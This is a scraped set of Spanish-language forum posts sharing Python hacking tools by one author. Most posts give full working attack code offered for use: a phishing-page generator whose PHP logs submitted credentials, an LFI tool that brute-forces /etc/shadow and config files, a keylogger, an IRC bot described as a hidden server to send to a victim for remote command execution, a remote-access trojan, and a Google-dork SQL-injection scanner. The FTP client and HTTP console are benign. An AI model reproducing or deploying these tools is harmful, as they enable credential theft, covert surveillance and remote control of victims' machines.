|
511
|
Programación / Scripting / [Python] RFI Tester
|
en: 7 Octubre 2011, 01:39 am
|
Hola a todos. Acabo de hacer un simple verificador de vulnerabilidad RFI #!usr/bin/python #RFI Tester (C) Doddy Hackman import os,sys,urllib2,re def header() : print "\n--== RFI Tester ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def test(web): try: print "\n[+] Testing vulnerability RFI in",web code = toma(web+"http://www.supertangas.com") if(re.findall("Los mejores TANGAS de la red",code,re.I)): print "[+] RFI Detected" else: print "[-] RFI Not Found" except: pass header() if len(sys.argv) != 2 : show() else : test(sys.argv[1]) copyright() #The End
Ejemplo de uso python rfi.py http://127.0.0.1/rfi.php?index=
C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=
--== RFI Tester ==--
[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index= [+] RFI Detected
(C) Doddy Hackman 2010
|
|
|
512
|
Programación / Scripting / [Python] Phising Gen By Doddy H
|
en: 7 Octubre 2011, 01:39 am
|
Hola a todos Acabo de terminar esta tool en python para generar los fakes o phising (si es que asi se escribe) No me dedico mucho a esa parte del hacking , pero hice esta cosa rara porque no tenia nada que hacer xDD. #!usr/bin/python #Phising Gen (C) Doddy Hackman import urllib2,sys,os def savefile(filename,text): file = open(filename,"w") file.write(text) def header() : print "\n\n--== Phising Gen ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n" def toma(web) : return urllib2.urlopen(web).read() def gen(web,new): try: print "\n[+] Working in the phishing" code = toma(web) text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>' print "[+] The fake was save in",new savefile(new,code+"\n\n"+text) except: pass header() if len(sys.argv) != 3 : show() else : gen(sys.argv[1],sys.argv[2]) copyright() #The End
Ejemplo de uso C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php yeah.php
--== Phising Gen ==--
[+] Working in the phishing [+] The fake was save in yeah.php
(C) Doddy Hackman 2010
|
|
|
513
|
Programación / Scripting / [Python] LFI T00l
|
en: 7 Octubre 2011, 01:38 am
|
Hola a todos. Acabo de terminar una tool para testear una vulnerabilidad LFI , si la pagina es vulnerable entonces el script automaticamente intenta brutear archivos. #!usr/bin/perl #LFI T00l (C) Doddy Hackman import os,sys,urllib2,re files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc'] def header() : print "\n--== LFI T00l ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def fuzz(web): print "\n[+] Fuzzing files...\n" for file in files: code = toma(web+file) if not (re.findall("No such file or directory in",code)): print "[File Found] : ",web,file def test(web): try: print "\n[+] Testing vulnerability LFI in",web code = toma(web+"'") if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)): fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I) print "\n[+] LFI Detected" print "[+] Full Path discloure : ",fpd[0] fuzz(web) else: print "[-] LFI Not Found" except: pass header() if len(sys.argv) != 2 : show() else : test(sys.argv[1]) copyright() #The End
Ejemplo de uso python lfi.py http://127.0.0.1/lfi.php?file=
C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=
--== LFI T00l ==--
[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=
[+] LFI Detected [+] Full Path discloure : C:\xampp\htdocs\lfi.php
[+] Fuzzing files...
(C) Doddy Hackman 2010
|
|
|
514
|
Programación / Scripting / [Python] Simple Keylogger
|
en: 7 Octubre 2011, 01:38 am
|
Un simple keylogger en Python #!usr/bin/python #Simple Keylogger in Python #(C) Doddy Hackman 2011 import pyHook,pythoncom def savefile(name,text): file = open(name,"a") file.write(text+"\n") file.close() def toma(frase): savefile("logs.txt",frase.Key) def capturar(): nave = pyHook.HookManager() nave.KeyDown = toma nave.HookKeyboard() pythoncom.PumpMessages() while 1: capturar() # The End
|
|
|
515
|
Programación / Scripting / [Python] IRC Bot
|
en: 7 Octubre 2011, 01:37 am
|
Hola a todos. Aca les traigo un IRC Bot en Python para poder usar como servidor oculto y mandarselo a una victima para poder controlarla desde un comando canal IRC El comando clave para mandar comandos que despues se muestra el resultado de comando en el chat es #!usr/bin/python #Insane Bot (C) Doddy Hackman 2011 #Version beta 0.00001 import re,socket import subprocess host = "127.0.0.1" canal = "#locos" nick = "bot" irc = socket.socket() try: irc.connect((host,6667)) irc.send("NICK "+nick+"\r\n") irc.send("USER "+nick+" 1 1 1 1\r\n") irc.send("JOIN "+canal+"\r\n") print "[+] Insane Bot Online\n" while 1: code = irc.recv(9999) if re.findall("PING",code): irc.send("PONG "+code.split()[1]+"\r\n") if re.findall("PRIVMSG",code): nick = code.split("!") nick = nick[0].replace(":","") msg = code.split(":")[2:][0] if re.findall("cmdnow",code): cmd = code.split("cmdnow")[1] irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n") rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) if rea: re1 = rea.stdout.read() total = re1.replace("\n","|") irc.send("PRIVMSG "+canal+" : "+total+"\n") else: re2 = rea.stderr.read() total = re2.replace("\n","|") irc.send("PRIVMSG "+canal+" : "+total+"\n") except: print "\n\n[-] Error\n\n" # The End
|
|
|
516
|
Programación / Scripting / [Python] HTTP Console By Doddy H
|
en: 7 Octubre 2011, 01:37 am
|
Bueno , este es un simple programa en python hecho en tk que permite mandar peticiones webs a un servidor en concreto #!usr/bin/python #Console (C) Doddy Hackman 2011 from Tkinter import * import socket global x,socket def execa() : s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((str(host.get()),80)) s.send(cmd.get()+"\r\n") data = s.recv(666) s.close() panel.insert(END,repr(data)) window = Tk() window.title("HTTP Console (C) Doddy Hackman 2011") window.maxsize(width="400",height="350") window.minsize(width="400",height="350") window.configure(background="black") window.configure(cursor="tcross") host = StringVar() cmd = StringVar() panel = Text(window,width=30,height=15,bg="black",fg="red") Label(window,bg="black").grid(row=3) Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4) entry = Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5) Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4) entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5) Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9) Label(window,bg="black").grid(row=19) panel.grid(row=20,column=5) window.mainloop()
|
|
|
517
|
Programación / Scripting / [Python] HellRat By Doddy H
|
en: 7 Octubre 2011, 01:37 am
|
Hola , aca traigo un troyano en python con las siguientes opciones - Ocultar inicio
- Mostrar inicio
- Ocultar barra de tereas
- Mostrar barra de tareas
- Abrir CD
- Cerrar CD
- Ejecutar comandos
- Mostrar informacion
server.py #!usr/bin/python #Hell RAt (C) Doddy Hackman 2011 import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess print "\n\n[+] Online\n\n" slave = socket.socket() slave.bind(("",666)) slave.listen(999) a,b = slave.accept() while True: rex = a.recv(20) if re.findall("getso",rex): z = os.name a.send(z) if re.findall("getpath",rex): h = os.getcwd() a.send(h) if re.findall("ocultarinicio",rex): x = win32gui.FindWindow("Shell_TrayWnd","") win32gui.ShowWindow(x,win32con.SW_HIDE) elif re.findall("mostrarinicio",rex): x = win32gui.FindWindow("Shell_TrayWnd","") win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL) elif re.findall("ocultaricono",rex): x = win32gui.FindWindow(0,"Program Manager") win32gui.ShowWindow(x,win32con.SW_HIDE) elif re.findall("mostraricono",rex): x = win32gui.FindWindow(0,"Program Manager") win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL) elif re.findall("abrircd",rex): ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None) elif re.findall("cerrarcd",rex): ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None) else: rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) if re: a.send(rea.stdout.read()) else: a.send(rea.stderr.read()) # The End
cliente.py #!usr/bin/python #HellRat (C) Doddy Hackman 2011 import os,socket,sys def head(): print "\n\n-- == hELLrAT == --\n\n" def copyright(): print "\n\n(C) Doddy Hackman 2011\n\n" def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def men(): try: ip = raw_input("[+] IP : ") client = socket.socket() client.connect((ip,666)) while True: clean() print "\n\n[+] Welcome to ",ip,"\n\n" print "\n\n[1] Informacion" print "[2] CMD" print "[3] Abrir CD" print "[4] Cerrar CD" print "[5] Ocultar iconos" print "[6] Mostrar iconos" print "[7] Ocultar barra de tareas" print "[8] Mostrar barra de tareas" print "[9] Cambiar IP" print "[10] Salir" op = input("\n\n[Opcion] : ") if op == 1: print "\n\n[+] Informacion\n\n" client.send("getso") so = client.recv(999) client.send("getpath") path = client.recv(999) print "[+] SO : "+so print "[+] Path : "+path raw_input() if op == 2: cmd = raw_input("\n[CMD] : ") client.send(cmd) code = client.recv(999) print code raw_input() if op == 3: client.send("abrircd") if op == 4: client.send("cerrarcd") if op == 5: client.send("ocultaricono") if op == 6: client.send("mostraricono") if op == 7: client.send("ocultarinicio") if op == 8: client.send("mostrarinicio") if op == 9: men() if op == 10: client.close() copyright() raw_input() sys.exit(1) except: print "\n\n[-] Error\n\n" head() men() # The End
|
|
|
518
|
Programación / Scripting / [Python] Google Inyector By dODDY h
|
en: 7 Octubre 2011, 01:36 am
|
Bueno , acabo de hacer un scanner de sqli. Este busca en google paginas con un dork marcado por ustedes , para despues borrar repetidos y scanear las webs encontradas #!usr/bin/python #Google Iny (C) Doddy Hackman 2011 import urllib2,re,os,sys def head(): print "\n\n -- == Google Iny == --\n" def copyright(): print "\n(C) Doddy Hackman 2011\n" sys.exit(1) def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def show(): print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n" def limpiar(pag): limpia = [] for p in pag: if not (re.findall("http://www.google.com.ar",p,re.I)): if p not in limpia: limpia.append(p) return limpia def sql(webs): for web in webs : if re.findall("=",web): web = re.split("=",web) web = web[0]+"=" try: code = toma(web+"-1+union+select+1--") if (re.findall("The used SELECT statements have a different number of columns",code,re.I)): print "[SQLI] : ",web,"\n" except: pass def scan(dork,count): pag = [] s = 10 while s <= int(count): try: code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s)) d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code) s += 10 for a in d: pag.append(a) except: copyright() pag = limpiar(pag) return pag head() if len(sys.argv) != 3: show() else : print "\n[+] SQL Scan Started\n" print "[+] Dork : ",sys.argv[1] print "[+] Count : ",sys.argv[2] pages = scan(sys.argv[1],sys.argv[2]) print "\n[+] Webs Found : ",len(pages),"\n" sql(pages) copyright()
|
|
|
519
|
Programación / Scripting / [Python] Fuzz DNS By Doddy H
|
en: 7 Octubre 2011, 01:34 am
|
Hola a todos. Aca les dejo un simple buscador de dns , solo ponen el dominio y esta cosita se encarga de buscarlas. #!usr/bin/python #LFI T00l (C) Doddy Hackman import os,sys,urllib2,re dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'] def header() : print "\n--== Fuzz DNS ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def search(web): print "\n[+] Searching DNS in",web,"\n" try: for d in dns: toma("http://"+d+"."+web) print "[DNS Link] : http://"+d+"."+web except: pass header() if len(sys.argv) != 2 : show() else : search(sys.argv[1]) copyright() #The End
Ejemplo de uso C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com
--== Fuzz DNS ==--
[+] Searching DNS in google.com
[DNS Link] : http://www.google.com
(C) Doddy Hackman 2010
|
|
|
520
|
Programación / Scripting / [Python] FTP Manager
|
en: 7 Octubre 2011, 01:34 am
|
Hola Aca traigo un simple cliente FTP #!usr/bin/python #FTP Manager 0.2 (C) Doddy Hackman 20111 from ftplib import FTP import sys def head(): print "\n -- == FTP Manger == --\n\n" def copyright(): print "\n\n(C) Doddy Hackman 2011\n" sys.exit(1) def show(): print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n" def menu(): print "\n" print "1 : dir" print "2 : cwd" print "3 : chdir" print "4 : delete dir" print "5 : delete file" print "6 : rename file" print "7 : make directory" print "8 : size" print "9 : abort\n\n" op = input("[Option] : ") return op def enter(host,user,password): print "[+] Connecting to ",host,"\n" enter = FTP(host,user,password) print "\n[+] Enter in the system\n" def menu2(): op = menu() if op == 1: try: lista = enter.dir() for a in lista: print a menu2() except: menu2() elif op == 2: try: print "\n\n[+] Path : "+enter.pwd()+"\n\n" menu2() except: menu2() elif op == 3: try: dir = raw_input("\n\n[Directory] : ") enter.cwd(dir) print "\n\n[+] Directory Changed\n\n" menu2() except: menu2() elif op == 4: try: dir = raw_input("\n\n[Directory] : ") enter.rmd(dir) print "\n\n[+] Directory Deleted\n\n" menu2() except: menu2() elif op == 5: try: file = raw_input("\n\n[File] : ") enter.delete(file) print "\n\n[+] File Deleted\n\n" menu2() except: menu2() elif op == 6: try: oldfile = raw_input("\n\n[Name] : ") newfile = raw_input("\n[New Name] : ") enter.rename(oldfile,newfile) print "\n\n[+] Name Changed\n\n" menu2() except: menu2() elif op == 7: try: dir = raw_input("\n\n[New Directory] : ") enter.mkd(dir) print "\n\n[+] Directory Created\n\n" menu2() except: menu2() elif op == 8: try: file = raw_input("\n\n[File] : ") peso = enter.size(file) print "\n\n[+] ",peso," KB \n\n" menu2() except: menu2() elif op == 9: enter.quit() copyright() else: menu2() menu2() head() if len(sys.argv) != 4: show() else: enter(sys.argv[1],sys.argv[2],sys.argv[3]) copyright()
|
|
|
|
|
|
|